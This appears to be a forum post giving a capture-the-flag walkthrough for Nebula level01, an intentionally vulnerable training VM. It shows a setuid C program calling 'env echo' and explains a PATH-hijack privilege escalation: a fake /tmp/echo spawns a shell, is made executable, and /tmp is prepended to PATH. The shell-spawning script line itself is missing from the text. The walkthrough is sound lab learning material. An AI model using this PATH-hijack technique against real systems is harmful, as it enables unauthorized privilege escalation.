How to pwned Nebula : Level01 - Path Attack


Exploit-Exercice : Nebula


The level00 was not really hard. In this level we will cover a path vulnerabiliy as well as a weak coding program

Level01 - Path Attack

For this level we have the source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");

This line will help us get the flag

system("/usr/bin/env echo and now what?");

The flag01 program call the echo command and print and now what

in the C code, echo is not a hardlink of the command so we can build our “own echo” command

create a new file call echo in /tmp

The contains of this file will be the following line


The script will simply run a shell as the flag01 account

make the script executable

chmod +x /tmp/echo

add tmp to the path variable

export PATH=/tmp:$PATH


You sucessfully get a shell and pwned level01 !


(system) closed #2

This topic was automatically closed after 30 days. New replies are no longer allowed.